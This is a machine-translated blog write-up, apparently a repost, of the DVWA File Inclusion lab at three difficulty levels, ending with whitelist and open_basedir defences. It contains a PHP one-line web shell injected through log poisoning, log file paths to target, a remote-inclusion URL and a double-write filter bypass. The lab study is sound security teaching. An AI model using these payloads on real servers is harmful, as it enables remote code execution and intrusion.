DVWA vulnerability Range - file contains (File Inclusion) open_basedir php authorized directory settings

Others 2019-08-02 22:24:54 views: null

basic knowledge:

php file that contains the vulnerability initiator is usually the following four functions:

  1. include()
  2. include_once()
  3. require()
  4. require_once()

   require_once () and include_once () function and require () and include () is similar. However, if a file has been included too, then require_once () and include_once () is no longer contain it, in order to avoid the function redefinitions or variable heavy assignment and other issues.

In php.ini, allow_url_fopen has been the default On, from and after php5.2 allow_url_include it defaults to Off.

classification:

Local file contains:

  It refers to open local files and contain loopholes.

Remote File Include:

  Only  when allow_url_fopen = On, allow_url_include = On are turned on in order to carry out remote file inclusion

 

1.low level

 

By seeing the source code directly to the incoming page parameters were included, without any filter

1. Local file contains

I dvwa built in windows, I d drive new flag.txt, contains the following manner:

In the case but generally did not get to directory information, we can contain the default location of the log

windows: apache/logs/access.log  apache/logs/error.log

linux: /var/log/apache/access.log  /var/log/apache2/access.log  /var/log/apache/access_log  /var/www/logs/access_log  /var/log/access_log

There is also a corresponding error.log

The use of web logs contain

localhost/dvwa/vulnerabilities/fi/?page=<?php @eval($_POST['shell']);?>

 

 Note that the browser will url encode special characters, leading to written word fails, you can use the packet capture decoding and then forwarded burpsuite

So log on the record of this request, the log contains the following, there will be a Trojan sentence

Ssh logs may comprise of a variety of ways, ssh log default location /var/log/auth.log

1. Remote File Inclusion

http comprising performed using conditions: allow_url_fopen on & allow_url_include on (off by default)

http://localhost/dvwa/vulnerabilities/fi/?page=http://www.baidu.com

 

 

2.medium level

View source

Str_replace found that the use of http: //, https: // replaced with a null

Str_replace function to the filter can be used for double the bypass

http://localhost/dvwa/vulnerabilities/fi/?page=hthttp://tp://www.baidu.com

 

 Found to contain success

 

 

3.high level

 View source

 

 To begin with incoming page file, you can use the file: // protocol for file reading

 

to sum up

Whitelist filtering

open_basedir php authorized directory settings

open_basedir can range limit active user access to files in the designated area

 

Guess you like

Origin www.cnblogs.com/ktfsong/p/11271282.html
Recommended
Ranking
ElasticSearch-- data modeling best practices
Permission Maintenance - Shadow User Backdoor
Refactor the code using MVP mode
Quantitative investment-fundamental model-PVC multi-factor model
Spark Big Data Processing Lecture Notes 3.2 Mastering RDD Operators
Blazor page components (2)
Erlernen von Kenntnissen zur Android-Entwicklung – Kodierung, Verschlüsselung, Hash, Serialisierung und Zeichensätze
About Qi high in JAVA study notes SORM summary detailed personal explanation
Will you calculate the accuracy of the rope displacement sensor in the measurement?
OPENJTAG debugging learning (3): debugging using the gdb command line
Daily
More
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)

Code World

© 2018 codetd.com